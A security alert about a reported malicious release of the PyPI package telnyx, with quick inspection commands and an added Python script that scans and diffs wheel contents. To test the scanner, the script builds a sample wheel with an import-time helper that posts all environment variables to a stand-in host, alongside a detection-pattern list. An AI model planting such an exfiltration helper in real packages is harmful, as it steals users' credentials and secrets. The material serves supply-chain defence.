Popular PyPI package telnyx was just compromised by TeamPCP. Used by major AI shops. If you run Python deps in CI or prod, this matters. Read the report: https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-canisterworm
What they do: push a malicious release. Python packages can run code at import/install time, so a tainted wheel can exfiltrate env vars, API keys, or spawn remote commands. Check for new maintainers, odd file names, and unexpected network calls in the package.
Quick, actionable checks:
pip download --no-deps telnyx== && unzip '*.whl' -d telnyx && grep -R -E "requests\.post|socket|os\.environ" telnyx
Run pip-audit, inspect the top-level __init__.py (anything that runs at import time), and compare the wheel contents to previous releases before trusting.
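The checks above (grep the unpacked wheel for import-time network and env-var access, then diff it against a previous release) as an added Python example, not code from the original post or from Aikido. It builds two small constructed wheels in memory, one clean and one with an added import-time exfil helper, so it runs offline; the `SUSPICIOUS` patterns and the file names inside the sample wheels are assumptions for illustration. Point `wheel_members` at real `.whl` files fetched with `pip download` to use it on a release pair.

```python
import io
import re
import zipfile

# Indicators the post suggests grepping for, plus exec/eval and subprocess.
# These are assumptions for this example, not a complete ruleset.
SUSPICIOUS = {
    "requests.post": re.compile(r"\brequests\.post\b"),
    "socket": re.compile(r"\bsocket\b"),
    "os.environ": re.compile(r"\bos\.environ\b"),
    "subprocess": re.compile(r"\bsubprocess\b"),
    "exec/eval": re.compile(r"\b(exec|eval)\s*\("),
}


def wheel_members(wheel_bytes):
    """Map every member of a wheel (a zip file) to its decoded text."""
    with zipfile.ZipFile(io.BytesIO(wheel_bytes)) as zf:
        return {n: zf.read(n).decode("utf-8", "replace") for n in zf.namelist()}


def scan_wheel(members):
    """Return (file, line number, indicator, line) for each hit in .py files."""
    findings = []
    for name, text in members.items():
        if not name.endswith(".py"):
            continue
        for lineno, line in enumerate(text.splitlines(), 1):
            for label, pat in SUSPICIOUS.items():
                if pat.search(line):
                    findings.append((name, lineno, label, line.strip()))
    return findings


def diff_members(old, new):
    """Compare two releases: files added, removed, and changed in content."""
    added = sorted(set(new) - set(old))
    removed = sorted(set(old) - set(new))
    changed = sorted(n for n in set(old) & set(new) if old[n] != new[n])
    return added, removed, changed


def build_wheel(files):
    """Pack a {path: text} dict into an in-memory zip shaped like a wheel."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, text in files.items():
            zf.writestr(name, text)
    return buf.getvalue()


# Constructed sample: a clean release of a hypothetical package.
CLEAN_WHEEL = build_wheel({
    "telnyx/__init__.py": '__version__ = "1.0.0"\nfrom .client import Client\n',
    "telnyx/client.py": "class Client:\n    pass\n",
})

# Constructed sample: the same package with an import-time helper added that
# reads the environment and posts it out. This is the pattern the post describes.
TAINTED_WHEEL = build_wheel({
    "telnyx/__init__.py": ('__version__ = "1.0.1"\nfrom .client import Client\n'
                           "from ._setup_helper import _run\n"),
    "telnyx/client.py": "class Client:\n    pass\n",
    "telnyx/_setup_helper.py": ("import os\nimport requests\n\n\ndef _run():\n"
                                '    requests.post("https://collector.invalid/u", '
                                "json=dict(os.environ))\n\n\n_run()\n"),
})


def report(old_wheel, new_wheel):
    """Diff the two releases and scan the new one; returns a summary dict."""
    old, new = wheel_members(old_wheel), wheel_members(new_wheel)
    added, removed, changed = diff_members(old, new)
    return {"added": added, "removed": removed, "changed": changed,
            "findings": scan_wheel(new)}


if __name__ == "__main__":
    r = report(CLEAN_WHEEL, TAINTED_WHEEL)
    for key in ("added", "removed", "changed"):
        print(f"{key}: {r[key]}")
    for name, lineno, label, line in r["findings"]:
        print(f"{name}:{lineno} [{label}] {line}")
```

A new file that is imported from `__init__.py` and contains both an env-var read and an outbound POST is exactly the shape worth stopping on; a hit on `socket` or `os.environ` alone in a networking client is often benign, so read the flagged lines rather than treating a count as a verdict.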